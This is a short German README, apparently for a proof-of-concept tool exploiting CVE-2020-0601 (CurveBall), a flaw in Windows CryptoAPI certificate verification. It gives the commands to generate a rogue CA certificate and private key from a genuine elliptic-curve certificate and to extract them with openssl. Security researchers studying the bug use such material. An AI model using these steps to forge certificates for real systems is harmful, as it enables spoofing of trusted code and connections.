
CVE-2020-0601: Windows-CryptoAPI-Sicherheitslücke. (CurveBall/ChainOfFools)
CVE-2020-0601: Auch bekannt als CurveBall oder ChainOffFools, ist eine Schwachstelle in der Microsoft CryptoApi (genauer gesagt in Crypt32.dll), bei der Elliptic-Curve-Signaturen (ECDSA) von Zertifikaten nicht korrekt verifiziert werden.
Es gibt einen sehr guten Blogbeitrag hier, der das Problem sehr anschaulich erklärt.
Dies sollte nur für Bildungs- und Forschungszwecke verwendet werden!
Geben Sie der Konsolenanwendung den Pfad zu einem Elliptic-Curve-Zertifikat.
CurveBall.exe 'PathToCA.cer'
Das Programm erzeugt eine .p12-Datei, die ein Zertifikat mit demselben öffentlichen Schlüssel und derselben Seriennummer wie das Original enthält, einschließlich eines Schlüssels.
Der Schlüssel und das Zertifikat können mit openssl aus der .p12-Datei extrahiert werden, indem die folgenden Befehle verwendet werden
openssl pkcs12 -in Rogue.p12 -nocerts -out CA.key
und
openssl pkcs12 -in Rogue.p12 -clcerts -nokeys -out CA.cer
HINWEIS: Das Standardpasswort ist 'Test1234'.